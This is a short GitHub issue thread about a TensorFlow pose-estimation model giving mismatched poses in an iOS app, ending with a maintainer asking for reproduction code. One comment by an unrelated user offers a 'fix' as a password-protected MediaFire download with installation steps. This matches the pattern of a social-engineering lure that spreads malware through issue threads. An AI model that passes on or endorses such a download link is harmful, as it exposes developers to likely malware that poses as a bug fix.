### ISSUE TITLE
Pose missmatch

### ISSUE THREAD

**Issue by IBSApple** [tensorflow/tensorflow#74894]
### Issue type

Bug

### Have you reproduced the bug with TensorFlow Nightly?

Yes

### Source

source

### TensorFlow version

0.0.1-nightly.20240118

### Custom code

Yes

### Current behavior?

Hello, 

        I am using pose estimation model to detect poses in iOS app using TensorFlow pose estimation model. But facing some issue while performing different poses.
![WhatsApp Image 2024-08-30 at 5 10 34 PM](https://github.com/user-attachments/assets/e60cd474-a504-4a85-b8d5-69961c6086c5)
![WhatsApp Image 2024-08-30 at 9 03 24 PM](https://github.com/user-attachments/assets/6fe69180-2bf4-41a4-8d90-27ec66e5152b)
![WhatsApp Image 2024-08-30 at 5 11 29 PM](https://github.com/user-attachments/assets/5674c02a-7a6e-427f-a17e-251bd5649506)
![WhatsApp Image 2024-08-30 at 9 03 24 PM](https://github.com/user-attachments/assets/57ae0368-9909-42bf-8eb2-ff2fb613a901)

### Standalone code to reproduce the issue

```shell
How can I resolve issue?
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Venkat6871** [comment]
Hi **@IBSApple** ,
Sorry for the delay, In order to expedite the trouble-shooting process, please provide a code snippet to reproduce the issue reported here.

Thank you!
